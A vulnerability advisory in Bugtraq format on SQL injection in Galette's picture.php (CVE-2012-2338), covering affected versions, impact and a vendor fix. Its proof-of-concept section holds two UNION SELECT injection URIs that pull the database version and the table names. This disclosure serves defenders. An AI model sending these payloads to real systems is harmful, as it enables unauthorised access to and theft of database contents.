BID:53463

Galette 'picture.php' SQL Injection Vulnerability

Info

Galette 'picture.php' SQL Injection Vulnerability

Bugtraq ID:	53463
Class:	Input Validation Error
CVE:	CVE-2012-2338
Remote:	Yes
Local:	No
Published:	May 09 2012 12:00AM
Updated:	May 14 2012 10:10PM
Credit:	Sofian Brabez
Vulnerable:	Galette Galette 0.63.3 Galette Galette 0.63.2 Galette Galette 0.63.1 Galette Galette 0.64rc1 Galette Galette 0.63

Not Vulnerable:	Galette Galette 0.7

Discussion

Galette 'picture.php' SQL Injection Vulnerability

Galette is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to Galette 0.7.x are vulnerable.

Exploit / POC

Galette 'picture.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available.

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+@@version,null

http://www.example.com/picture.php?id_adh=0+and+1=0+union+select+group_concat(table_name,char(10)),null+from+information_schema.tables

Solution / Fix

Galette 'picture.php' SQL Injection Vulnerability

Solution:
Vendor updates are available. Please see the references for more information.

References

Galette 'picture.php' SQL Injection Vulnerability

References:

CVE-request: galette sql injection (Johan Cwiklinski)
Galette Homepage (Galette )